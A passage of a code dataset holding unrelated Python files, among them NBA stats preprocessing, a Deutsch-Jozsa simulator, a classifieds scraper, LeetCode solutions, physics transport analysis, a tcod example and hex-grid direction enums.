\"year_end\" : int, \n \"year_start\" : int,\n } \n # apply datatype changes\n final_df = final_df.astype(final_convert) \n\n # dropping 'position_y', 'born', 'year_start', 'year_end', 'three_pt_tries'\n final_df = final_df.drop([\"position_y\", \"born\", \"year_start\", \"year_end\", \n 
\"three_pt_tries\"], axis=1)\n\n # renaming 'position_x' to just 'position'\n final_df = final_df.rename(columns = {\"position_x\" : \"position\"})\n\n # rearranging columns for reading ease\n final_df = final_df[[\"player\", \"position\", \"age\", \"height_inches\", \"weight\", \"team\", \n \"birth_date\", \"birth_city\", \"birth_state\", \"year\", \"college\", \n \"games\", \"games_started\", \"minutes_played\", \"usage_%\",\n \"points\", \"field_goals\", \"field_goal_attempts\", \n \"field_goal_%\", \"effective_field_goal_%\",\n \"2_point_tries\", \"2_pointers\", \"2_point_%\", \n \"3_point_tries\", \"3_pointers\", \"3_point_%\",\n \"free_throws\", \"free_throw_attempts\", \"free_throw_%\", \n \"true_shooting_%\", \"assists\", \"assist_%\", \n \"blocks\", \"block_%\", \"steals\", \n \"steal_%\", \"total_rebounds\", \"total_rebound_%\", \n \"off_rebounds\", \"off_rebound_%\", \"def_rebounds\", \"def_rebound_%\",\n \"turnovers\", \"turnover_%\", \"offensive_win_shares\",\n \"defensive_win_shares\", \"win_shares\", \"win_shares_per_48min\",\n \"personal_fouls\", \"player_efficiency\", \"off_box_plus_minus\", \n \"def_box_plus_minus\", \"box_plus_minus\", \"value_over_replacement\",\n ]]\n\n # renaming of more columns for clarity's sake\n final_df = final_df.rename(columns={\n \"weight\": \"weight_lbs\", \n \"birth_date\" : \"date_of_birth\",\n \"year\" : \"season\",\n \"points\" : \"total_points\",\n \"field_goals\" : \"field_goals_made\",\n \"2_pointers\" : \"2_pointers_made\",\n \"2_pointers_tries\" : \"2_pointers_made\",\n \"3_pointers\" : \"3_pointers_made\",\n \"3_point_tries\" : \"3_pointers_tried\",\n \"off_plus_minus\" : \"value_on_offense\", \n \"def_box_plus_minus\" : \"value_on_defense\",\n \"def_box_plus_minus\" : \"total_value\", \n \"value_over_replacement\" : \"value_over_bench_sub\"},) \n\n # setting 'final_df' column 'player' to index\n final_df = final_df.set_index(\"player\")\n\n #--------- Title final_df ---------------------------\n d = final_df.isnull().sum().sum()\n final_df_shape = final_df.shape\n print(\"Final DataFrame\")\n print(\"Consisting of player_data_df, players_df, and seasons_stats_df.\")\n print(f\"It contains {final_df_shape[0]} rows and {final_df_shape[1]} columns\")\n print(f\"It has loads of data, but also has {d} missing values.\")\n\n # get the dataframe back\n return final_df","sub_path":"shay/src/nba_preprocessing.py","file_name":"nba_preprocessing.py","file_ext":"py","file_size_in_byte":7258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"589449185","text":"\"\"\"\r\nAUTHOR: Luis Gabriel Q. 
del Rosario\r\nDATE: 01 MAY, 2019\r\nDESCRIPTION: Simulation of Deutsch-Jozsa algorithm using Linear Algebra\r\n - NOTE: FILENAME of input should be test_cases.txt\r\n - INPUT #1 is the number of qubits, INCLUDING the ancilla bit\r\n - INPUT #2 is the function mapping for f(x), separated by newlines\r\n - OUTPUT consists of the ff:\r\n - Probability distribution of final outcomes\r\n - Pie chart of the distribution\r\n - Verdict on wether the function is constant or balanced\r\n\"\"\"\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nH = np.matrix(((1, 1), (1, -1))) / np.sqrt(2)\r\nZ = np.matrix(((1, 0), (0, -1)))\r\nX = np.matrix(((0, 1), (1, 0)))\r\nP0 = np.matrix(((1, 0), (0, 0)))\r\nP1 = np.matrix(((0, 0), (0, 1)))\r\n\r\ndef scale(qnum, op, num_qubits):\r\n \"\"\"Generate a matrix that only applies gate 'op' to its respective qubit.\"\"\"\r\n gate_list = [np.eye(2) for i in range(num_qubits)] # all qubits go through I\r\n gate_list[qnum] = op # this is the only qubit that has a gate that isn't I\r\n scaled = gate_list[0] # start scaling from the 1st qubit\r\n\r\n # get the kronecker product of all gates in gate_list\r\n for quantum_gate in gate_list[1:]:\r\n scaled = np.kron(scaled, quantum_gate)\r\n\r\n return scaled\r\n\r\ndef scale_all(op, num_qubits, skip_last=False):\r\n \"\"\"Generate a matrix that applies 'op' to all qubits (skip_last means last qubit is I).\"\"\"\r\n scaled = op\r\n for repeat in range(num_qubits - (2 if skip_last else 1)):\r\n scaled = np.kron(scaled, op)\r\n if skip_last:\r\n scaled = np.kron(scaled, np.eye(2))\r\n return scaled\r\n\r\ndef get_tensor(vectors):\r\n \"\"\"Compute the tensor product of all vectors in the given list.\"\"\"\r\n tensor = vectors[0]\r\n for vector in vectors[1:]:\r\n tensor = np.kron(tensor, vector)\r\n return tensor.transpose()\r\n\r\ndef init_qubits(num_qubits):\r\n \"\"\"Initialize all qubit vectors based on num_qubits.\"\"\"\r\n q = [np.matrix([1,0]) for i in range(num_qubits)]\r\n return get_tensor(q)\r\n\r\ndef CNOT(control, target, num_qubits):\r\n \"\"\"Generate CNOT based on the idea that CNOT = (P0 (x) I) + (P1 (x) X).\"\"\"\r\n term_0 = scale(control, P0, num_qubits)\r\n term_1 = (scale(control, P1, num_qubits) * scale(target, X, num_qubits))\r\n return term_0 + term_1\r\n\r\ndef run_algo(op_list):\r\n \"\"\"Execute all operations in a given list (multiply all matrices to each other).\"\"\"\r\n ops = op_list[::-1] # reverse the list; after all, it's matrix mult.\r\n result = ops[0]\r\n for op in ops[1:]:\r\n result = result * op\r\n return result\r\n\r\ndef measure(result, num_qubits):\r\n \"\"\"Omit the last qubit, combine probabilities of the same kind (e.g. 
000/001, 100/101)\"\"\"\r\n measurement = np.zeros(2**(num_qubits-1))\r\n for index, value in enumerate(result.transpose().tolist()[0]):\r\n measurement[index >> 1] += value * value\r\n return measurement\r\n\r\ndef significant(n):\r\n \"\"\"Check if a value differs significantly from 0.\"\"\"\r\n return (n < -1e-10 or n > 1e-10)\r\n\r\ndef generate_pie_chart(measurement, num_qubits):\r\n \"\"\"Generates a pie chart for the probability distribution of a given measurement.\"\"\"\r\n x_labels = []\r\n measurement_to_plot = []\r\n\r\n # Only plot outcomes whose probability differs significantly from 0.\r\n for r in range(2**(num_qubits-1)):\r\n if (significant(measurement[r])):\r\n x_labels.append(bin(r)[2:])\r\n measurement_to_plot.append(measurement[r])\r\n plt.pie(measurement_to_plot, labels=x_labels)\r\n plt.show()\r\n\r\ndef U(f_map, num_qubits):\r\n \"\"\"Generate an oracle matrix based on the given function mapping.\"\"\"\r\n # INSPIRED BY https://github.com/meownoid/quantum-python/blob/master/quantum.py\r\n\r\n U = np.zeros((2**num_qubits, 2**num_qubits)) # Start with a matrix of zeroes.\r\n \r\n # Quantum state looks like IN-IN-IN-IN-IN-IN-OUT\r\n for input_state in range(2**num_qubits): # For each possible input\r\n input_string = input_state >> 1 # remove OUT\r\n output_qubit = (input_state & 1) ^ (f_map[input_string]) # remove IN, XOR with f(IN)\r\n output_state = (input_string << 1) + output_qubit # the full state, with new OUT\r\n U[input_state, output_state] = 1 # set that part of U to 1\r\n return U\r\n\r\ndef print_probabilities(measurement, num_qubits):\r\n \"\"\"Print the probability distribution of a measurement.\"\"\"\r\n print (\"\\n\\tPROBABILITY DISTRIBUTION OF OUTCOMES:\\n\")\r\n print (\"\\tOUTCOME\\t\\tP(n)\")\r\n print (\"\\t-------\\t\\t----\")\r\n for label, p in enumerate(measurement):\r\n print (\"\\t{0:0{1}b}\\t\\t{2:.2%}\".format(label, num_qubits-1, p))\r\n\r\ndef deutsch_jozsa(f_map, num_qubits):\r\n \"\"\"Run the Deutsch-Jozsa Algorithm. 
Returns T if constant and F if balanced.\"\"\"\r\n op_list = [] # the list of operations\r\n\r\n op_list.append(init_qubits(num_qubits)) # Initialize qubits to |0>\r\n op_list.append(scale(num_qubits-1, X, num_qubits)) # Set last qubit to |1>\r\n\r\n # START: H on all qubits\r\n op_list.append(scale_all(H, num_qubits))\r\n\r\n # Apply oracle function based on user-input f_map\r\n op_list.append(U(f_map, num_qubits))\r\n\r\n # END: H on all but last qubit\r\n op_list.append(scale_all(H, num_qubits, skip_last=True))\r\n\r\n # RUN THE ALGORITHM\r\n result = run_algo(op_list)\r\n\r\n # Measure all but last qubit\r\n measurement = measure(result, num_qubits)\r\n\r\n # Finally, determine function type, and generate pie chart.\r\n # print_probabilities(measurement)\r\n # generate_pie_chart(measurement)\r\n \r\n # CONSTANT if measurement of |0> is positive, else BALANCED\r\n return True if significant(measurement[0]) else False\r\n\r\ndef main():\r\n test_cases_file = open(\"test_cases.txt\", \"r\")\r\n\r\n for case_no, line in enumerate(test_cases_file):\r\n f_map = list(map(int, line.split()))\r\n num_qubits = f_map.pop(0)\r\n result = deutsch_jozsa(f_map, num_qubits)\r\n print(\"CASE {}: {}\".format(case_no+1, (\"CONSTANT\" if result else \"BALANCED\")))\r\n test_cases_file.close()\r\nmain()","sub_path":"deutsch_jozsa_simulator.py","file_name":"deutsch_jozsa_simulator.py","file_ext":"py","file_size_in_byte":6012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} {"seq_id":"560961218","text":"import requests\nfrom bs4 import BeautifulSoup\nimport pymongo\nfrom datetime import datetime\n\nclient = pymongo.MongoClient('localhost',27017)\nganji = client['ganji']\nurl_list = ganji['url_list']\nitem_info = ganji['item_info']\n# pymongo setup code\n\ndef get_link_from(url,times = 0):# the caller passes all_link as url\n if times > 10:# limit the number of retries\n return\n for page in range(1,31):# step through 30 listing pages\n list_views = '{}o{}'.format(url,page)\n try:\n wb_data = requests.get(list_views,timeout=6)# timeout limit for the request\n except:\n return get_link_from(url,times + 1)\n soup = BeautifulSoup(wb_data.text,'lxml')\n if soup.select('div.noinfotishi'):# return if the page has no listings\n return\n else:\n for link in soup.select('td.t > a'):\n item_link = link.get('href')\n if 'zhuanzhuan' in item_link:\n print(item_link)\n url_list.insert_one({'url':item_link})# insert a record like {'url':'xx'}\n# initial listing links\n\ndef get_item_info_from(url,times = 0):\n if times > 10:\n return\n try:\n wb_data = requests.get(url,timeout = 6)\n except:\n return get_item_info_from(url,times + 1)\n soup = BeautifulSoup(wb_data.text,'lxml')\n item = item_info.find({'url':url})\n if item.count() > 0:\n if soup.select('span.soldout_btn'):\n print('get one!')\n item_info.update({'url':url},{'$set':{'sold_date':str(datetime.now().strftime('%Y,%m,%d'))}})\n else:\n title = soup.select('h1.info_titile')\n price = soup.select('span.price_now > i')\n area = soup.select('div.palce_li > span > i')\n view = soup.select('span.look_time')\n cate = soup.select('span.crb_i > a')\n data = {\n 'title':title[0].text if title else None,\n 'price':price[0].text if price else 0,\n 'area':area[0].text.split('-') if area else None,\n 'view':view[0].text if view else None,\n 'cate':cate[-1].text.strip() if cate else None,\n 'date':str(datetime.now().strftime('%Y,%m,%d')),\n 'sold_date':None,\n 'url':url,\n }\n # the scraped item's detail fields\n print(data)\n 
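# save the parsed item into the item_info collection\n 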
item_info.insert_one(data)\n","sub_path":"ganji/page_parsing.py","file_name":"page_parsing.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} {"seq_id":"213328206","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: longshuicui\n@date : 2021/1/26\n@function:\n605. Can Place Flowers (Easy)\nhttps://leetcode.com/problems/can-place-flowers/\nProblem description\n You have a long flowerbed in which some plots are planted and some are not. However, flowers cannot be planted in adjacent plots.\n Given an integer array flowerbed containing 0s and 1s, where 0 means empty and 1 means not empty, and an integer n, return whether n new flowers can be planted in the flowerbed without violating the no-adjacent-flowers rule.\nSample input and output\n Input: flowerbed = [1,0,0,0,1], n = 2\n Output: false\n\"\"\"\n\n\ndef canPlaceFlowers(flowerbed, n):\n count = 0\n i = 0\n while i < len(flowerbed):\n if flowerbed[i] == 0 \\\n and (i == 0 or flowerbed[i - 1] == 0) \\\n and (i == len(flowerbed) - 1 or flowerbed[i + 1] == 0):\n count += 1\n flowerbed[i] = 1\n i += 1\n i += 1\n if count < n:\n return False\n return True\n\n\nflowerbed=[1,0,0,0,0,1]\nn=2\nres=canPlaceFlowers(flowerbed, n)\nprint(res)\n","sub_path":"01.贪心算法/分配问题/605.Can Place Flowers (Easy).py","file_name":"605.Can Place Flowers (Easy).py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} {"seq_id":"588808938","text":"class Solution(object):\n def countBits(self, num):\n \"\"\"\n :type num: int\n :rtype: List[int]\n \"\"\"\n ret = []\n for i in range(num + 1):\n temp = i\n count = 0\n while temp > 0:\n if temp % 2 == 1:\n count += 1\n temp //= 2\n # print(\"i = \", i, \"count = \", count)\n ret.append(count)\n return ret\n\n\ns = Solution()\nprint(s.countBits(128))\n","sub_path":"LeetCode/338. Counting Bits.py","file_name":"338. Counting Bits.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} {"seq_id":"74742808","text":"import math\nimport csv\n\nimport numpy as np\nimport scipy.optimize\n\nfrom elflab import constants, abstracts\nimport elflab.datasets as datasets\n\n# For a pair of R's obtained by the van der Pauw method, compute the sheet resistance Rs, using the Brent1973 method\ndef van_der_Pauw(R_horizontal, R_vertical, xtol=1e-12, rtol=4.4408920985006262e-16, maxiter=100):\n # Defining the equation f(Rs)=0\n def f(Rs):\n A = math.exp(-constants.pi * R_horizontal / Rs)\n B = math.exp(-constants.pi * R_vertical / Rs)\n return A + B - 1.\n if R_horizontal < R_vertical:\n R1 = R_horizontal\n R2 = R_vertical\n else:\n R2 = R_horizontal\n R1 = R_vertical\n Rmin = constants.pi * R1 /constants.ln2 - xtol\n Rmax = constants.pi * (R1+R2) / 2. 
/constants.ln2 + xtol\n \n Rs = scipy.optimize.brentq(f, Rmin, Rmax, args=(), xtol=xtol, rtol=rtol, maxiter=maxiter, full_output=False, disp=True)\n return Rs\n\n# For a pair of data sets, calculating the sets of sheet resistance by van der Pauw method, using \"param\" as the interpolation parameter\ndef van_der_Pauw_set(set1, set2, param):\n # sort set2 according to param\n set2sorted = set2.sort(param)\n # filter set1 to have param within the range of set2\n indices = [i for i in range(len(set1[param]))\n if (set1[param][i] >= set2sorted[param][0]) and (set1[param][i] <= set2sorted[param][-1])]\n result = set1.empty()\n for key in result:\n result[key] = set1[key][indices]\n # Compute VdP sheet resistance\n set2R = set2sorted.interpolator(param, \"R\")\n set2err = set2sorted.interpolator(param, \"err_R\")\n for i in range(len(result[param])):\n x = result[param][i]\n R1 = result[\"R\"][i]\n dR1 = result[\"err_R\"][i]\n R2 = set2R(x)\n dR2 = set2err(x)\n Rs = van_der_Pauw(R1, R2)\n result[\"R\"][i] = Rs\n result[\"err_R\"][i] = dR1 + dR2 # Very approximately\n return result\n\n# Split MR into down and up sweeps\ndef split_MR_down_up(data):\n # Find the minimum \n index = np.argmin(data[\"H\"])\n up = data.empty()\n down = data.empty()\n for key in data:\n down[key] = data[key][:index].copy()\n up[key] = data[key][index:].copy()\n return (down, up) \n\n \n# Split MR at zero field\ndef split_MR_zero(data):\n index = np.argmin(np.abs(data[\"H\"]))\n a = data.empty()\n b = data.empty()\n for key in data:\n a[key] = data[key][:index].copy()\n b[key] = data[key][index:].copy()\n return (a, b)\n\n \n# Symmetrise / Antisymmetrise magnetoresistance data, by default using linear interpolation\ndef symmetrize_MR(data, mirror, spline_order=1): # data and its mirror\n # Sort the mirror set by H\n sorted_mirror = mirror.sort(\"H\")\n # prepare the interpolators\n mirror_R = mirror.interpolator(\"H\", \"R\", order=spline_order)\n mirror_err_R = mirror.interpolator(\"H\", \"err_R\", order=spline_order)\n \n # filtering through data, only getting data points where H is in range of the mirror\n indices = [i for i in range(len(data[\"H\"]))\n if (data[\"H\"][i] <= -(sorted_mirror[\"H\"][0])) and (data[\"H\"][i] >= -(sorted_mirror[\"H\"][-1]))]\n result = data.empty()\n for key in data:\n result[key] = data[key][indices]\n \n # compute symmetrized R and its standard error\n result[\"R\"] = 0.5 * (result[\"R\"] + mirror_R(-result[\"H\"]))\n result[\"err_R\"] = 0.5 * (result[\"err_R\"]**2 + mirror_err_R(-result[\"H\"])**2)**0.5\n \n return result\n \ndef antisymmetrize_MR(data, mirror, spline_order=1): # data and its mirror\n # Sort the mirror set by H\n sorted_mirror = mirror.sort(\"H\")\n # prepare the interpolators\n mirror_R = mirror.interpolator(\"H\", \"R\", order=spline_order)\n mirror_err_R = mirror.interpolator(\"H\", \"err_R\", order=spline_order)\n \n # filtering through data, only getting data points where H is in range of the mirror\n indices = [i for i in range(len(data[\"H\"]))\n if (data[\"H\"][i] <= -(sorted_mirror[\"H\"][0])) and (data[\"H\"][i] >= -(sorted_mirror[\"H\"][-1]))]\n result = data.empty()\n for key in data:\n result[key] = data[key][indices]\n \n # compute symmetrized R and its standard error\n result[\"R\"] = 0.5 * (result[\"R\"] - mirror_R(-result[\"H\"]))\n result[\"err_R\"] = 0.5 * (result[\"err_R\"]**2 + mirror_err_R(-result[\"H\"])**2)**0.5\n \n return 
result\n","sub_path":"analysis/transport.py","file_name":"transport.py","file_ext":"py","file_size_in_byte":4406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"143222406","text":"#!/usr/bin/env python3\n# To the extent possible under law, the libtcod maintainers have waived all\n# copyright and related or neighboring rights for this script. This work is\n# published from: United States.\n# https://creativecommons.org/publicdomain/zero/1.0/\n\"\"\"An example showing the console being resized to fit the window.\"\"\"\nfrom typing import Tuple\n\nimport tcod\nimport tcod.event\nimport tcod.tileset\n\nimport custrender # Using the custom renderer engine.\n\n\ndef fit_console(width: int, height: int) -> Tuple[int, int]:\n \"\"\"Return a console resolution the fits the given pixel resolution.\"\"\"\n # Use the current active tileset as a reference.\n tileset = tcod.tileset.get_default()\n return width // tileset.tile_width, height // tileset.tile_height\n\n\ndef main() -> None:\n window_flags = (\n tcod.lib.SDL_WINDOW_RESIZABLE | tcod.lib.SDL_WINDOW_MAXIMIZED\n )\n renderer_flags = tcod.lib.SDL_RENDERER_PRESENTVSYNC\n with custrender.init_sdl2(640, 480, None, window_flags, renderer_flags):\n console = tcod.console.Console(\n *fit_console(*custrender.get_renderer_size())\n )\n TEXT = \"Resizable console with no stretching.\"\n while True:\n console.clear()\n\n # Draw the checkerboard pattern.\n console.tiles[\"bg\"][::2, ::2] = (32, 32, 32, 255)\n console.tiles[\"bg\"][1::2, 1::2] = (32, 32, 32, 255)\n\n console.print_box(0, 0, 0, 0, TEXT)\n\n # These functions are explained in `custrender.py`.\n custrender.clear((0, 0, 0))\n custrender.accumulate(\n console, custrender.get_viewport(console, True, True)\n )\n custrender.present()\n\n for event in tcod.event.wait():\n if event.type == \"QUIT\":\n raise SystemExit()\n elif event.type == \"WINDOWRESIZED\":\n # Replace `console` with a new one of the correct size.\n console = tcod.console.Console(\n *fit_console(event.width, event.height)\n )\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"examples/experimental/resizable_console.py","file_name":"resizable_console.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"473833001","text":"import json\nfrom typing import List\n\nfrom c2cgeoform.schema import GeoFormSchemaNode\nimport colander\nfrom deform.widget import MappingWidget, SelectWidget, SequenceWidget, TextAreaWidget\n\nfrom c2cgeoportal_admin import _\nfrom c2cgeoportal_commons.lib.validators import url\nfrom c2cgeoportal_commons.models.main import Metadata\n\n\n@colander.deferred\ndef metadata_definitions(node, kw): # pylint: disable=unused-argument\n return {m[\"name\"]: m for m in kw[\"request\"].registry.settings[\"admin_interface\"][\"available_metadata\"]}\n\n\n@colander.deferred\ndef metadata_name_widget(node, kw): # pylint: disable=unused-argument\n return SelectWidget(\n values=[\n (m[\"name\"], m[\"name\"])\n for m in sorted(\n kw[\"request\"].registry.settings[\"admin_interface\"][\"available_metadata\"],\n key=lambda m: m[\"name\"],\n )\n ]\n )\n\n\ndef json_validator(node, value):\n try:\n json.loads(value)\n except ValueError as e:\n raise colander.Invalid(node, _('Parser report: \"{}\"').format(str(e)))\n\n\ndef regex_validator(node, value):\n definition = node.metadata_definitions[value[\"name\"]]\n if definition.get(\"type\", \"string\") == \"regex\":\n validator = 
colander.Regex(definition[\"regex\"], msg=_(definition[\"error_message\"]))\n try:\n validator(node[\"string\"], value[\"string\"])\n except colander.Invalid as e:\n error = colander.Invalid(node)\n error.add(e, node.children.index(node[\"string\"]))\n raise error\n\n\nclass MetadataSchemaNode(GeoFormSchemaNode): # pylint: disable=abstract-method\n\n metadata_definitions = None\n\n def __init__(self, *args, **kw):\n super().__init__(*args, **kw)\n\n self.available_types: List[str] = []\n\n self._add_value_node(\"string\", colander.String())\n self._add_value_node(\"liste\", colander.String())\n self._add_value_node(\"boolean\", colander.Boolean())\n self._add_value_node(\"int\", colander.Int())\n self._add_value_node(\"float\", colander.Float())\n self._add_value_node(\"url\", colander.String(), validator=url)\n self._add_value_node(\n \"json\", colander.String(), widget=TextAreaWidget(rows=10), validator=json_validator\n )\n\n def _add_value_node(self, type_name, colander_type, **kw):\n self.add_before(\n \"description\",\n colander.SchemaNode(colander_type, name=type_name, title=_(\"Value\"), missing=colander.null, **kw),\n )\n self.available_types.append(type_name)\n\n def objectify(self, dict_, context=None):\n # depending on the type get the value from the right widget\n dict_[\"value\"] = dict_[self._ui_type(dict_[\"name\"])]\n return super().objectify(dict_, context)\n\n def dictify(self, obj):\n dict_ = super().dictify(obj)\n value = obj.value or colander.null\n # depending on the type set the value in the right widget\n dict_[self._ui_type(obj.name)] = value\n return dict_\n\n def _ui_type(self, metadata_name):\n # pylint: disable=unsubscriptable-object\n metadata_type = self.metadata_definitions[metadata_name].get(\"type\", \"string\")\n return metadata_type if metadata_type in self.available_types else \"string\"\n\n\nmetadatas_schema_node = colander.SequenceSchema(\n MetadataSchemaNode(\n Metadata,\n name=\"metadata\",\n metadata_definitions=metadata_definitions,\n validator=regex_validator,\n widget=MappingWidget(template=\"metadata\"),\n overrides={\"name\": {\"widget\": metadata_name_widget}},\n ),\n name=\"metadatas\",\n title=_(\"Metadatas\"),\n metadata_definitions=metadata_definitions,\n widget=SequenceWidget(template=\"metadatas\", category=\"structural\"),\n)\n","sub_path":"admin/c2cgeoportal_admin/schemas/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":3767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"459858787","text":"from sys import stdin\nfrom collections import Counter\n\nT = int(stdin.readline())\n\nfor t in range(T):\n N = int(stdin.readline())\n c = Counter()\n for _ in range(2 * N - 1):\n c.update(int(i) for i in stdin.readline().split())\n missing = [i for (i,v) in c.most_common() if v % 2 == 1]\n missing.sort()\n print('Case #{}: {}'.format(t + 1, \" \".join(str(i) for i in missing)))\n\n \n","sub_path":"codes/CodeJamCrawler/16_1_2/Math.Wizard.Boy/rank.py","file_name":"rank.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"434551778","text":"\"\"\"The direction enums of a Hex.\"\"\"\n\nfrom enum import IntEnum\n\n\nclass HexSideDir(IntEnum):\n \"\"\"The direction of a HexSide.\"\"\"\n UL = 0\n UR = 1\n R = 2\n LR = 3\n LL = 4\n L = 5\n\n def isAdjacent(self, otherDir):\n \"\"\"Returns true if the other direction is adjacent of this direction.\"\"\"\n if self == 
HexSideDir.UL:\n return otherDir == HexSideDir.L or otherDir == HexSideDir.UR\n if self == HexSideDir.UR:\n return otherDir == HexSideDir.UL or otherDir == HexSideDir.R\n if self == HexSideDir.R:\n return otherDir == HexSideDir.UR or otherDir == HexSideDir.LR\n if self == HexSideDir.LR:\n return otherDir == HexSideDir.R or otherDir == HexSideDir.LL\n if self == HexSideDir.LL:\n return otherDir == HexSideDir.LR or otherDir == HexSideDir.L\n if self == HexSideDir.L:\n return otherDir == HexSideDir.LL or otherDir == HexSideDir.UL\n raise AssertionError(\"Invalid Hex Side direction.\")\n\n def getAdjacentSides(self):\n \"\"\"Returns a tuple of the two adjacent directions.\"\"\"\n if self == HexSideDir.UL:\n return (HexSideDir.L, HexSideDir.UR)\n if self == HexSideDir.UR:\n return (HexSideDir.UL, HexSideDir.R)\n if self == HexSideDir.R:\n return (HexSideDir.UR, HexSideDir.LR)\n if self == HexSideDir.LR:\n return (HexSideDir.R, HexSideDir.LL)\n if self == HexSideDir.LL:\n return (HexSideDir.LR, HexSideDir.L)\n if self == HexSideDir.L:\n return (HexSideDir.LL, HexSideDir.UL)\n raise AssertionError(\"Invalid Hex Side direction.\")\n\n def opposite(self):\n \"\"\"Get the opposite direction of a give HexSideDir.\"\"\"\n if self == HexSideDir.UL:\n return HexSideDir.LR\n if self == HexSideDir.UR:\n return HexSideDir.LL\n if self == HexSideDir.R:\n return HexSideDir.L\n if self == HexSideDir.LR:\n return HexSideDir.UL\n if self == HexSideDir.LL:\n return HexSideDir.UR\n if self == HexSideDir.L:\n return HexSideDir.R\n raise AssertionError(\"Invalid Hex Side direction.\")\n\n def connectedVertexDirs(self):\n \"\"\"Get the vertices associated with this direction.\n\n Returns:\n (HexVertexDir, HexVertexDir): The two vertex directions associated with this direction.\n The return will always be sorted according to this order: T, UR, LR, B, LL, UR\n \"\"\"\n\n if self == HexSideDir.UL:\n return (HexVertexDir.T, HexVertexDir.UL)\n if self == HexSideDir.UR:\n return (HexVertexDir.T, HexVertexDir.UR)\n if self == HexSideDir.R:\n return (HexVertexDir.UR, HexVertexDir.LR)\n if self == HexSideDir.LR:\n return (HexVertexDir.LR, HexVertexDir.B)\n if self == HexSideDir.LL:\n return (HexVertexDir.LL, HexVertexDir.B)\n if self == HexSideDir.L:\n return (HexVertexDir.UL, HexVertexDir.LL)\n raise AssertionError(f\"Invalid side direction: {self}\")\n\n def __str__(self):\n if self == HexSideDir.UL:\n return \"UL\"\n if self == HexSideDir.UR:\n return \"UR\"\n if self == HexSideDir.R:\n return \"R\"\n if self == HexSideDir.LR:\n return \"LR\"\n if self == HexSideDir.LL:\n return \"LL\"\n if self == HexSideDir.L:\n return \"L\"\n raise AssertionError(\"Invalid Hex Side direction\")\n\n\nclass HexVertexDir(IntEnum):\n \"\"\"The direction of a HexVertex.\"\"\"\n T = 0\n UR = 1\n LR = 2\n B = 3\n LL = 4\n UL = 5\n\n def opposite(self):\n \"\"\"Returns the opposite direction of this VertexDir.\"\"\"\n if self == HexVertexDir.T:\n return HexVertexDir.B\n if self == HexVertexDir.UR:\n return HexVertexDir.LL\n if self == HexVertexDir.LR:\n return HexVertexDir.UL\n if self == HexVertexDir.B:\n return HexVertexDir.T\n if self == HexVertexDir.LL:\n return HexVertexDir.UR\n if self == HexVertexDir.UL:\n return HexVertexDir.LR\n raise AssertionError(\"Invalid Hex Vertex direction\")\n\n def getAdjacentVertexDirs(self):\n \"\"\"Returns a tuple of the two VertexDirs that are adjacent to this VertexDir.\"\"\"\n if self == HexVertexDir.T:\n return (HexVertexDir.UL, HexVertexDir.UR)\n if self == HexVertexDir.UR:\n return (HexVertexDir.T, 
HexVertexDir.LR)\n if self == HexVertexDir.LR:\n return (HexVertexDir.UR, HexVertexDir.B)\n if self == HexVertexDir.B:\n return (HexVertexDir.LR, HexVertexDir.LL)\n if self == HexVertexDir.LL:\n return (HexVertexDir.B, HexVertexDir.UL)\n if self == HexVertexDir.UL:\n return (HexVertexDir.LL, HexVertexDir.T)\n raise AssertionError(\"Invalid Hex Vertex direction\")\n\n def get120DegVertices(self):\n \"\"\"Returns a tuple of the two VertexDirs that are 120 degrees from this VertexDir.\"\"\"\n if self == HexVertexDir.T:\n return (HexVertexDir.LL, HexVertexDir.LR)\n if self == HexVertexDir.UR:\n return (HexVertexDir.UL, HexVertexDir.B)\n if self == HexVertexDir.LR:\n return (HexVertexDir.T, HexVertexDir.LL)\n if self == HexVertexDir.B:\n return (HexVertexDir.UR, HexVertexDir.UL)\n if self == HexVertexDir.LL:\n return (HexVertexDir.LR, HexVertexDir.T)\n if self == HexVertexDir.UL:\n return (HexVertexDir.B, HexVertexDir.UR)\n raise AssertionError(\"Invalid Hex Vertex direction\")\n\n def connectedSideDirs(self):\n \"\"\"Get the `HexSideDirs` connected to this vertex direction.\n\n Returns:\n (HexSide, HexSide): The two side directions connected to this vertex direction.\n \"\"\"\n if self == HexVertexDir.T:\n return (HexSideDir.UL, HexSideDir.UR)\n if self == HexVertexDir.UR:\n return (HexSideDir.UR, HexSideDir.R)\n if self == HexVertexDir.LR:\n return (HexSideDir.R, HexSideDir.LR)\n if self == HexVertexDir.B:\n return (HexSideDir.LR, HexSideDir.LL)\n if self == HexVertexDir.LL:\n return (HexSideDir.LL, HexSideDir.L)\n if self == HexVertexDir.UL:\n return (HexSideDir.L, HexSideDir.UL)\n raise AssertionError(\"Invalid Hex Vertex direction\")\n\n def __str__(self):\n if self == HexVertexDir.T:\n return \"T\"\n if self == HexVertexDir.UR:\n return \"UR\"\n if self == HexVertexDir.LR:\n return \"LR\"\n if self == HexVertexDir.B:\n return \"B\"\n if self == HexVertexDir.LL:\n return \"LL\"\n if self == HexVertexDir.UL:\n return \"UL\"\n raise AssertionError(\"Invalid Hex Vertex direction\")\n","sub_path":"hex_dir.py","file_name":"hex_dir.py","file_ext":"py","file_size_in_byte":6936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"447018795","text":"import gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\nfrom string import ascii_lowercase\n\n# returns a float\ndef getFullSum():\n # use creds to create a client to interact with the Google Drive API\n scope = 